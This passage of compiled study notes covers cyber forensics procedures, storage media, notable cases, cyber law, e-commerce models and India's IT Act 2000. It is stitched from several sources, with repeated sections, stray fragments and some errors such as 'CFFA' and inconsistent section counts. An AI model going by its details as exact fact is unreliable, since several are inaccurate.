smart devices, collect huge data which is crucial in cyber forensics.
• It is also helpful for innocent people to prove their innocence via the evidence
collected online.
• It is not only used to solve digital crimes but also used to solve real-world crimes
like theft cases, murder, etc.
• Businesses are equally benefitted from cyber forensics in tracking system breaches
and finding the attackers.
The Process Involved in Cyber Forensics
1. Obtaining a digital copy of the system that is being or is required to be inspected.
2. Authenticating and verifying the reproduction.
3. Recovering deleted files (using Autopsy Tool).
4. Using keywords to find the information you need.
5. Establishing a technical report.

How did Cyber Forensics Experts work?

Cyber forensics is a field that follows certain procedures to find the evidence to reach
conclusions after proper investigation of matters. The procedures that cyber forensic
experts follow are:
• Identification: The first step of cyber forensics experts are to identify what
evidence is present, where it is stored, and in which format it is stored.
• Preservation: After identifying the data the next step is to safely preserve the data
and not allow other people to use that device so that no one can tamper data.
• Analysis: After getting the data, the next step is to analyze the data or system. Here
the expert recovers the deleted files and verifies the recovered data and finds the
evidence that the criminal tried to erase by deleting secret files. This process might
take several iterations to reach the final conclusion.
• Documentation: Now after analyzing data a record is created. This record contains
all the recovered and available(not deleted) data which helps in recreating the crime
scene and reviewing it.
• Presentation: This is the final step in which the analyzed data is presented in front
of the court to solve cases.

Types of computer forensics

There are multiple types of computer forensics depending on the field in which digital
investigation is needed. The fields are:
• Network forensics: This involves monitoring and analyzing the network traffic to
and from the criminal’s network. The tools used here are network intrusion detection
systems and other automated tools.
• Email forensics: In this type of forensics, the experts check the email of the
criminal and recover deleted email threads to extract out crucial information related
to the case.
• Malware forensics: This branch of forensics involves hacking related crimes. Here,
the forensics expert examines the malware, trojans to identify the hacker involved
behind this.
• Memory forensics: This branch of forensics deals with collecting data from the
memory(like cache, RAM, etc.) in raw and then retrieve information from that data.
• Mobile Phone forensics: This branch of forensics generally deals with mobile
phones. They examine and analyze data from the mobile phone.
• Database forensics: This branch of forensics examines and analyzes the data from
databases and their related metadata.
• Disk forensics: This branch of forensics extracts data from storage media by
searching modified, active, or deleted files.

Techniques that cyber forensic investigators use

Cyber forensic investigators use various techniques and tools to examine the data and
some of the commonly used techniques are:
• Reverse steganography: Steganography is a method of hiding important data inside
the digital file, image, etc. So, cyber forensic experts do reverse steganography to
analyze the data and find a relation with the case.
• Stochastic forensics: In Stochastic forensics, the experts analyze and reconstruct
digital activity without using digital artifacts. Here, artifacts mean unintended
alterations of data that occur from digital processes.
• Cross-drive analysis: In this process, the information found on multiple computer
drives is correlated and cross-references to analyze and preserve information that is
relevant to the investigation.
• Live analysis: In this technique, the computer of criminals is analyzed from within
the OS in running mode. It aims at the volatile data of RAM to get some valuable
information.
• Deleted file recovery: This includes searching for memory to find fragments of a
partially deleted file in order to recover it for evidence purposes.

Advantages

• Cyber forensics ensures the integrity of the computer.

• Through cyber forensics, many people, companies, etc get to know about such
crimes, thus taking proper measures to avoid them.
• Cyber forensics find evidence from digital devices and then present them in court,
which can lead to the punishment of the culprit.
• They efficiently track down the culprit anywhere in the world.
• They help people or organizations to protect their money and time.
• The relevant data can be made trending and be used in making the public aware of
it.

What are the required set of skills needed to be a cyber forensic expert?

The following skills are required to be a cyber forensic expert:

• As we know, cyber forensic based on technology. So, knowledge of various
technologies, computers, mobile phones, network hacks, security breaches, etc. is
required.
• The expert should be very attentive while examining a large amount of data to
identify proof/evidence.
• The expert must be aware of criminal laws, a criminal investigation, etc.
• As we know, over time technology always changes, so the experts must be updated
with the latest technology.
• Cyber forensic experts must be able to analyse the data, derive conclusions from it
and make proper interpretations.
• The communication skill of the expert must be good so that while presenting
evidence in front of the court, everyone understands each detail with clarity.
• The expert must have strong knowledge of basic cyber security.

Computer equipment and associated storage media

Digital forensics is the process that deals with the recovery and investigation of data that is
stored on digital devices. It also pertains to the hardware and software tools that experts use to
retrieve the data without loss. In this lesson, we will discuss data storage devices, what these
devices are, how they are used, and the benefits of each separately in digital forensics.

Data Forensics Introduction

Forensic technologies are designed to prepare and extract evidence from computer systems. Any
devices that store data (e.g. computers, laptops, smartphones, memory cards or external hard
drives) are within the ambit of digital forensics. The forensics process is outlined as follows:

1. Identification
2. Preservation
3. Collection
4. Examination
5. Analysis
6. Presentation

The two basic types of data that are collected in computer forensics are persistent data, or data
stored on a local hard drive (or another device) which is preserved when the computer is turned
off and volatile data, or data that is stored in memory and lost when the computer loses power.
In forensics, to handle this data there exist experts in operating and file systems, data recovery,
cloud computing, and more. They analyze hard disks or hard-disk images from a variety of
different operating systems and provide an interface so that files can be analyzed and information
or data gathered in an electronic format is extremely easy to extract and
store. Lesson Quiz Course

Forensics & Storage Devices

There are many devices that store data in the world today. Some are old and antiquated, but nonetheless still
store data and may need to have recovery methods performed on them. The most popular are outlined below.
Solid State Disks (SSD)
Solid State Disks (SSD's) store data with the use of flash-memory chips (called NAND flash memory). There
are no moving parts to break and data is stored electronically, not magnetically. The advantages of SSD's are
its size, weight, and less power usage than hard disks. They come in many different shapes depending on chip
count and how those chips are arranged. They are more expensive, but are faster in reading and writing data.
One drawback is that there are no warning signs if a total drive failure is about to occur. They are a suitable
replacement for hard drives in desktop and laptop computers. Traditional forensic methods fail when
attempting recovering information deleted from SSD drives, so new methods have been determined.

Magnetic Media
Magnetic media store data on a magnetized medium. There are three types of storage devices in this area:

• Floppy disks: These devices contain soft magnetic disks used for data transfer, storage and backup of
small amounts of data. An important disadvantage is that they can be affected by heat, dust and
magnetic fields. Floppy disks have been largely replaced by flash memory, optical disks, and external
hard drives.
• Hard drives: These devices contain hard magnetic platters which store and retrieve digital
information. They are more accessible and affordable than SSD's and with the largest capacity. One
drawback is that they consume more power and produce noise while in operation than do SSD's.
Because of movable, mechanical parts, a hard drive it is vulnerable to damage when shaken or
dropped. Data resides on these disks even after the power supply is turned off. Information from hard
drives may be recoverable using data carving techniques or by using a commercial data recovery
tool. Another forensic recovery method is to clone a hard drive to an image file. This is more practical
but depends of the size of the source hard drive and the equipment that it is used.
• Magnetic tapes: These devices are similar to an audio cassette tape. They are well-suited for
archiving because of their high capacity, low cost and long durability. Compared to a hard disk, these
are very slow. You can only get to data by winding through the tape. Data is downloaded to magnetic
tapes mostly for long-term storage. Because data is stored magnetically, care must be taken to keep
tapes away from all types of magnetic fields. They differ in the way that data is retrieved because they
must be read in a linear fashion, from the start of the tape through the end of the tape. This drastically
increases the time it takes to make a forensic recovery.

Digital Audio Tapes

Digital audio tapes are magnetic tape cassettes that store audio information in digital manner. Low cost and
compact size are some clear benefits. These can only be recorded and played back in one direction, however.
Many of these types of tapes and their hardware are no longer being manufactured by major companies,
creating forensic recovery issues.

Digital Linear Tapes

Digital Linear Tapes (DLT) are a good replacement for digital audio tapes. They use a special algorithm that
facilitates retrieval and storage of data at high speeds. These tapes can store up to 35Gb per cassette by using
'longitudinal recording' techniques. A main use of these tapes is to back up servers in a data center and can be
easily recovered for forensic purposes.
What is computer forensics?
Computer forensics is the application of investigation and analysis techniques to
gather and preserve evidence from a particular computing device in a way that is
suitable for presentation in a court of law. The goal of computer forensics is to
perform a structured investigation and maintain a documented chain of evidence to
find out exactly what happened on a computing device and who was responsible for it.

Computer forensics -- which is sometimes referred to as computer forensic science --

essentially is data recovery with legal compliance guidelines to make the information
admissible in legal proceedings. The terms digital forensics and cyber forensics are
often used as synonyms for computer forensics.

Digital forensics starts with the collection of information in a way that maintains its
integrity. Investigators then analyze the data or system to determine if it was changed,
how it was changed and who made the changes. The use of computer forensics isn't
always tied to a crime. The forensic process is also used as part of data recovery
processes to gather data from a crashed server, failed drive, reformatted operating
system (OS) or other situation where a system has unexpectedly stopped working.

Why is computer forensics important?

In the civil and criminal justice system, computer forensics helps ensure the integrity
of digital evidence presented in court cases. As computers and other data-collecting
devices are used more frequently in every aspect of life, digital evidence -- and the
forensic process used to collect, preserve and investigate it -- has become more
important in solving crimes and other legal issues.

The average person never sees much of the information modern devices collect. For
instance, the computers in cars continually collect information on when a driver
brakes, shifts and changes speed without the driver being aware. However, this
information can prove critical in solving a legal matter or a crime, and computer
forensics often plays a role in identifying and preserving that information.

Digital evidence isn't just useful in solving digital-world crimes, such as data theft,
network breaches and illicit online transactions. It's also used to solve physical-world
crimes, such as burglary, assault, hit-and-run accidents and murder.
Businesses often use a multilayered data management, data governance and network
security strategy to keep proprietary information secure. Having data that's well
managed and safe can help streamline the forensic process should that data ever come
under investigation.

Businesses also use computer forensics to track information related to a

system or network compromise, which can be used to identify and prosecute
cyber attackers. Businesses can also use digital forensic experts and processes
to help them with data recovery in the event of a system or network failure
caused by a natural or other disaster.

As the world becomes more reliant on digital technology for the core
functions of life, cybercrime is rising. As such, computer forensic specialists
no longer have a monopoly on the field. See how the police in the U.K. are
adopting computer forensic techniques to keep up with increasing rates of
cybercrime.

Types of computer forensics

There are various types of computer forensic examinations. Each deals with a
specific aspect of information technology. Some of the main types include
the following:

• Database forensics. The examination of information contained in

databases, both data and related metadata.
• Email forensics. The recovery and analysis of emails and other
information contained in email platforms, such as schedules and contacts.
• Malware forensics. Sifting through code to identify possible malicious
programs and analyzing their payload. Such programs may include Trojan
horses, ransomware or various viruses.
• Memory forensics. Collecting information stored in a computer's random access
memory (RAM) and cache.

• Mobile forensics. The examination of mobile devices to retrieve and analyze the
information they contain, including contacts, incoming and outgoing text
messages, pictures and video files.
• Network forensics. Looking for evidence by monitoring network traffic, using tools
such as a firewall or intrusion detection system.
How does computer forensics work?
Forensic investigators typically follow standard procedures, which vary depending on
the context of the forensic investigation, the device being investigated or the
information investigators are looking for. In general, these procedures include the
following three steps:

1. Data collection. Electronically stored information must be collected in a way that

maintains its integrity. This often involves physically isolating the device under
investigation to ensure it cannot be accidentally contaminated or tampered with.
Examiners make a digital copy, also called a forensic image, of the device's
storage media, and then they lock the original device in a safe or other secure
facility to maintain its pristine condition. The investigation is conducted on the
digital copy. In other cases, publicly available information may be used for
forensic purposes, such as Facebook posts or public Venmo charges for purchasing
illegal products or services displayed on the Vicemo website.

2. Analysis. Investigators analyze digital copies of storage media in a sterile

environment to gather the information for a case. Various tools are used to assist in
this process, including Basis Technology's Autopsy for hard drive investigations
and the Wireshark network protocol analyzer. A mouse jiggler is useful when
examining a computer to keep it from falling asleep and losing volatile
memory data that is lost when the computer goes to sleep or loses power.

3. Presentation. The forensic investigators present their findings in a legal proceeding,

where a judge or jury uses them to help determine the result of a lawsuit. In a data
recovery situation, forensic investigators present what they were able to recover
from a compromised system.

Often, multiple tools are used in computer forensic investigations to validate the
results they produce. Learn how a researcher at Kaspersky Lab in Asia created an
open source forensics tool for remotely collecting malware evidence without
compromising system integrity.
Techniques forensic investigators use
Investigators use a variety of techniques and proprietary forensic applications to
examine the copy they've made of a compromised device. They search hidden folders
and unallocated disk space for copies of deleted, encrypted or damaged files. Any
evidence found on the digital copy is carefully documented in a finding report and
verified with the original device in preparation for legal proceedings that involve
discovery, depositions or actual litigation.

Computer forensic investigations use a combination of techniques and expert

knowledge. Some common techniques include the following:

• Reverse steganography. Steganography is a common tactic used to hide data inside

any type of digital file, message or data stream. Computer forensic experts reverse
a steganography attempt by analyzing the data hashing that the file in question
contains. If a cybercriminal hides important information inside an image or other
digital file, it may look the same before and after to the untrained eye, but the
underlying hash or string of data that represents the image will change.

• Stochastic forensics. Here, investigators analyze and reconstruct digital activity

without the use of digital artifacts. Artifacts are unintended alterations of data that
occur from digital processes. Artifacts include clues related to a digital crime, such
as changes to file attributes during data theft. Stochastic forensics is frequently
used in data breach investigations where the attacker is thought to be an insider,
who might not leave behind digital artifacts.

• Cross-drive analysis. This technique correlates and cross-references information

found on multiple computer drives to search for, analyze and preserve information
relevant to an investigation. Events that raise suspicion are compared with
information on other drives to look for similarities and provide context. This is
also known as anomaly detection.

• Live analysis. With this technique, a computer is analyzed from within the OS
while the computer or device is running, using system tools on the computer. The
analysis looks at volatile data, which is often stored in cache or RAM. Many tools
used to extract volatile data require the computer in to be in a forensic lab to
maintain the legitimacy of a chain of evidence.
• Deleted file recovery. This technique involves searching a computer system and
memory for fragments of files that were partially deleted in one place but leave
traces elsewhere on the machine. This is sometimes known as file carving or data
carving.

Find out more about computer forensic analytics in this chapter from the book Python
Forensics: A Workbench for Inventing and Sharing Digital Forensic Technology, by
Chet Hosmer. It shows how to use Python and cybersecurity technology to preserve
digital evidence.

How is computer forensics used as evidence?

Computer forensics has been used as evidence by law enforcement agencies and in
criminal and civil law since the 1980s. Some notable cases include the following:

• Apple trade secret theft. An engineer named Xiaolang Zhang at Apple's

autonomous car division announced his retirement and said he would be moving
back to China to take care of his elderly mother. He told his manager he planned to
work at an electronic car manufacturer in China, raising suspicion. According to a
Federal Bureau of Investigation (FBI) affidavit, Apple's security team reviewed
Zhang's activity on the company network and found, in the days prior to his
resignation, he downloaded trade secrets from confidential company databases to
which he had access. He was indicted by the FBI in 2018.

• Enron. In one of the most commonly cited accounting fraud scandals, Enron, a
U.S. energy, commodities and services company, falsely reported billions of
dollars in revenue before going bankrupt in 2001, causing financial harm to many
employees and other people who had invested in the company. Computer forensic
analysts examined terabytes of data to understand the complex fraud scheme. The
scandal was a significant factor in the passing of the Sarbanes-Oxley Act of 2002,
which set new accounting compliance requirements for public companies. The
company declared bankruptcy in 2001.

• Google trade secret theft. Anthony Scott Levandowski, a former executive of both
Uber and Google, was charged with 33 counts of trade secret theft in 2019. From
2009 to 2016, Levandowski worked in Google's self-driving car program, where
he downloaded thousands of files related to the program from a password-
protected corporate server. He departed from Google and created Otto, a self-
 driving truck company, which Uber bought in 2016, according to The New York
Times. Levandowski plead guilty to one count of trade secrets theft and was
sentenced to 18 months in prison and $851,499 in fines and
restitution. Levandowski received a presidential pardon in January 2021.

• Larry Thomas. Thomas shot and killed Rito Llamas-Juarez in 2016 Thomas was
later convicted with the help of hundreds of Facebook posts he made under the
fake name of Slaughtaboi Larro. One of the posts included a picture of him
wearing a bracelet that was found at the crime scene.

• Michael Jackson. Investigators used metadata and medical documents from

Michael Jackson's doctor's iPhone that showed the doctor, Conrad Murray,
prescribed lethal amounts of medication to Jackson, who died in 2009.

• Mikayla Munn. Munn drowned her newborn baby in the bathtub of her Manchester
University dorm room in 2016. Investigators found Google searches on her
computer containing the phrase "at home abortion," which were used to convict
her.

Murder is just one of the many types of crime computer forensics can aid in
combating. Learn how forensic financial analysis software is used to combat fraud.
 Cyber Ethics and Laws
Introduction to Cyber Laws
Cyber law, also known as Internet Law or Cyber Law, is the part of the overall legal
system thet is related to legal informatics and supervises the digital circulation of
information, e-commerce, software and information security. It is associated with legal
informatics and electronic elements, including information systems, computers, software, and
hardware. It covers many areas, such as access to and usage of the Internet, encompassing
various subtopics as well as freedom of expression, and online privacy.
Cyber laws help to reduce or prevent people from cybercriminal activities on a large scale
with the help of protecting information access from unauthorized people, freedom of speech
related to the use of the Internet, privacy, communications, email, websites, intellectual
property, hardware and software, such as data storage devices. As Internet traffic is
increasing rapidly day by day, that has led to a higher percentage of legal issues worldwide.
Because cyber laws are different according to the country and jurisdiction, restitution ranges
from fines to imprisonment, and enforcement is challenging.
Cyberlaw offers legal protections for people who are using the Internet as well as running
an online business. It is most important for Internet users to know about the local area and
cyber law of their country by which they could know what activities are legal or not on the
network. Also, they can prevent ourselves from unauthorized activities.
The Computer Fraud and Abuse Act was the first cyber law, called CFFA, that was
enacted in 1986. This law was helpful in preventing unauthorized access to computers. And it
also provided a description of the stages of punishment for breaking that law or performing
any illegal activity.
Cyber Law also called IT Law is the law regarding Information-technology including
computers and the internet. It is related to legal informatics and supervises the digital
circulation of information, software, information security, and e-commerce.
IT law does not consist of a separate area of law rather it encloses aspects of contract,
intellectual property, privacy, and data protection laws. Intellectual property is a key element
of IT law. The area of software license is controversial and still evolving in Europe and
elsewhere.
E-commerce

E-commerce (Electronic Commerce) is the buying and selling of goods and services, or the
transmitting of funds or data, over the internet.

E-commerce is a methodology of modern business which addresses the need of business

organizations, vendors and customers to reduce cost and improve the quality of goods and
services while increasing the speed of delivery.

E-commerce refers to paperless exchange of business information using EDI, E-mail, electronic
fund transfer etc.

E-commerce web sites are like on-line market places where you can sell and buy items, and
facilitate it by advertising your product, establishing newsgroups and blogs, posting job-oriented
resumes etc.

Types of E-commerce models:

There are four main types of ecommerce models that can describe almost every transaction that
takes place between consumers and businesses.
1. Business-to-Consumer (B2C)

The B2C model involves transaction between business organization and customer. The business
organization sells its products directly to a consumer. Customer can view the products shown on
the website. The customer can choose a product and order the same. The website will then send a
notification to the business organization via email and the organization will dispatch the
product/goods to the customer.

2. Business-to-Business (B2B)

The B2B model involves the transaction between companies/businesses, such as between a
manufactures and a wholesaler or between wholesaler and a retailer. The business/company sells
its products to an intermediate buyer who then sells the product to the final customer.

3. Consumer-to-Business (C2B)
The C2B model involves a transaction between a consumer and business organization. It is
similar to B2C model, however the difference is that in this case the consumer is the seller and
business organization is the buyer. In this kind of transaction, the consumer decide the price of a
particular product, which business accept or decline.

4. Consumer-to-Consumer (C2C)
The C2C model involves transaction between consumers. Here, a consumer sells directly to
another consumer. A well-known example is eBay.

E-governance

E-governance is the application of information and communication technology (ICT) for

delivering government services, exchange of information communication transactions,
integration of various stand-alone systems and services between government-to-customer (G2C),
government-to-business (G2B), government-to-government (G2G) as well as back office
processes and interactions within the entire government framework.
Through e-governance, government services will be made available to citizens in a convenient,
efficient and transparent manner. The three main target groups that can be distinguished in
governance concepts are government, citizens and businesses/interest groups. In e-governance
there are no distinct boundaries.

Certifying Authority and Controller

As per Section 18 of The Information Technology Act, 2000 provides the required legal sanctity
to the digital signatures based on asymmetric cryptosystems. The digital signatures are now
accepted at par with handwritten signatures and the electronic documents that have been digitally
signed are treated at par with paper documents.
The IT Act provides for the Controller of Certifying Authorities(CCA) to license and regulate the
working of Certifying Authorities. The Certifying Authorities (CAs) issue digital signature
certificates for electronic authentication of users.
The Controller of Certifying Authorities (CCA) has been appointed by the Central Government
under section 17 of the Act for purposes of the IT Act. The Office of the CCA came into
existence on November 1, 2000. It aims at promoting the growth of E-Commerce and E-
Governance through the wide use of digital signatures.
The Controller of Certifying Authorities (CCA) has established the Root Certifying Authority
(RCAI) of India under section 18(b) of the IT Act to digitally sign the public keys of Certifying
Authorities (CA) in the country. The RCAI is operated as per the standards laid down under the
Act.
The CCA certifies the public keys of CAs using its own private key, which enables users in the
cyberspace to verify that a given certificate is issued by a licensed CA. For this purpose it
operates, the Root Certifying Authority of India(RCAI). The CCA also maintains the Repository
of Digital Certificates, which contains all the certificates issued to the CAs in the country.

A Certifying Authority is a trusted body whose central responsibility is to issue, revoke, renew
and provide directories of Digital Certificates. Certifying Authority means a person who has
been granted a license to issue an Electronic Signature Certificate under section 24.
Provisions with regard to Certifying Authorities are covered under Chapter VI i.e. Sec.17
to Sec.34 of the IT Act, 2000. It contains detailed provisions relating to the appointment and
powers of the Controller and Certifying Authorities. Controller of Certifying Authorities
(CCA)
The IT Act provides for the Controller of Certifying Authorities (CCA) to license and
regulate the working of Certifying Authorities. The Certifying Authorities (CAs) issue digital
signature certificates for electronic authentication of users.
The CCA certifies the public keys of CAs using its own private key, which enables users
in the cyberspace to verify that a given certificate is issued by a licensed CA. For this
purpose it operates, the Root Certifying Authority of India (RCAI). The CCA also maintains
the National Repository of Digital Certificates (NRDC), which contains all the certificates
issued by all the CAs in the country.
The functions of the Controller are –
(a) to exercise supervision over the activities of the Certifying Authorities;
(b) certify public keys of the Certifying Authorities;
(c) lay down the standards to be maintained by the Certifying Authorities;
(d) specify the qualifications and experience which employees of the Certifying
Authorities should possess;
(e) specify the conditions subject to which the Certifying Authorities shall conduct their
business;
(f) specify the content of written, printed or visual material and advertisements that may be
distributed or used in respect of a Electronic Signature Certificate and the Public Key;
(g) specify the form and content of a Electronic Signature Certificate and the key;
(h) specify the form and manner in which accounts shall be maintained by the Certifying
Authorities;
(i) specify the terms and conditions subject to which auditors may be appointed and the
remuneration to be paid to them;
(j) facilitate the establishment of any electronic system by a Certifying Authority either
solely or jointly with other Certifying Authorities and regulation of such systems;
 (k) specify the manner in which the Certifying Authorities shall conduct their dealings
with the subscribers;
(l) resolve any conflict of interests between the Certifying Authorities and the subscribers;
(m) lay down the duties of the Certifying Authorities;
(n) maintain a data-base containing the disclosure record of every Certifying Authority
containing such particulars as may be specified by regulations, which shall be accessible to
the public. Controller has the power to grant recognition to foreign certifying authorities with
the previous approval of the Central Government, which will be subject to such conditions
and restrictions imposed by regulations.

Offences under IT Act

The Information Technology Act, 2000 also Known as an IT Act is an act proposed by the
Indian Parliament reported on 17th October 2000. This Information Technology Act is based
on the United Nations Model law on Electronic Commerce 1996 (UNCITRAL Model) which
was suggested by the General Assembly of United Nations by a resolution dated on 30th
January, 1997. It is the most important law in India dealing with Cybercrime and E-Commerce.
The main objective of this act is to carry lawful and trustworthy electronic, digital and online
transactions and alleviate or reduce cybercrimes. The IT Act has 13 chapters and 90 sections.
The last four sections that starts from ‘section 91 – section 94’, deals with the revisions to the
Indian Penal Code 1860.
The introduction of the internet has brought the tremendous changes in our lives. People of
all fields are increasingly using the computers to create, transmit and store information in the
electronic form instead of the traditional papers, documents. Information stored in electronic
forms has many advantages, it is cheaper, easier to store, easier to retrieve and for speedier to
connection. Though it has many advantages, it has been misused by many people in order to
gain themselves or for sake or otherwise to harm others. The high and speedier connectivity
to the world from any place has developed many crimes and these increased offences led to
the need of law for protection. Some countries have been rather been vigilant and formed
some laws governing the net. In order to keep in pace with the changing generation, the
Indian Parliament passed the law --- Information Technology Act 2000. The IT Act 2000 has
been conceptualized on the United Nations Commissions on International Trade Law
(UNCITRAL) Model Law.
The increase rate of technology in computers has led to enactment of Information
Technology Act 2000. The converting of the paper work into electronic records, the storage
of the electronic data, has led tremendous changed the scenario of the country. The Act
further amends the Indian Penal Code, 1860, The Evidence Act, 1872, The Banker’s Book’s
Evidence Act, 1891 and The Reserve Bank of India Act, 1934.
Offences:
Cyber offences are the unlawful acts which are carried in a very sophisticated manner in
which either the computer is the tool or target or both. Cyber crime usually includes:
(a) Unauthorized access of the computers
(b) Data diddling
(c) Virus/worms attack
(d) Theft of computer system
(e) Hacking
(f) Denial of attacks
(g) Logic bombs
(h) Trojan attacks
(i) Internet time theft
(j) Web jacking
 (k) Email bombing
(l) Salami attacks
(m) Physically damaging computer system.

The offences included in the IT Act 2000 are as follows:

1. Tampering with the computer source documents.

2. Hacking with computer system.
3. Publishing of information which is obscene in electronic form.
4. Power of Controller to give directions
5. Directions of Controller to a subscriber to extend facilities to decrypt information
6. Protected system
7. Penalty for misrepresentation
8. Penalty for breach of confidentiality and privacy
9. Penalty for publishing Digital Signature Certificate false in certain particulars
10. Publication for fraudulent purpose
11. Act to apply for offence or contravention committed outside India
12. Confiscation
13. Penalties or confiscation not to interfere with other punishments.
14. Power to investigate offences.

Intellectual Property Rights in Cyberspace. at Network Layer-IPSec

Intellectual Property (IP) simply refers to the creation of the mind. It refers to the
possession of thought or design by the one who came up with it. It offers the owner of any
inventive design or any form of distinct work some exclusive rights, that make it unlawful to
copy or reuse that work without the owner’s permission. It is a part of property law. People
associated with literature, music, invention, etc. can use it in business practices.

There are numerous types of tools of protection that come under the term “intellectual
property”. Notable among these are the following:

Patent
Trademark
Geographical indications
Layout Designs of Integrated Circuits
Trade secrets
Copyrights
Industrial Designs
Cyberspace is the non-physical domain where numerous computers are connected through
computer networks to establish communication between them. With the expansion of
technology, cyberspace has come within reach of every individual. This fact led to the
emergence of cyberspace as a business platform and hence increases pressure on Intellectual
Property. Nowadays, cyber crimes do not solely limit themselves to fraud, cyberbullying,
identity thefts but also an infringement of copyrights and trademarks of various businesses
and other organizations. Online content needs to be protected and hence Intellectual Property
Rights and Cyber laws cannot be separated.

In cyberspace, sometimes one person makes a profit by using another person’s creation
without the owner’s consent. This is a violation of privacy, and it is protected by IPR. We
have certain laws to avoid violation of Intellectual Property Rights in cyberspace and when it
is violated, then additionally we have several remedies in law.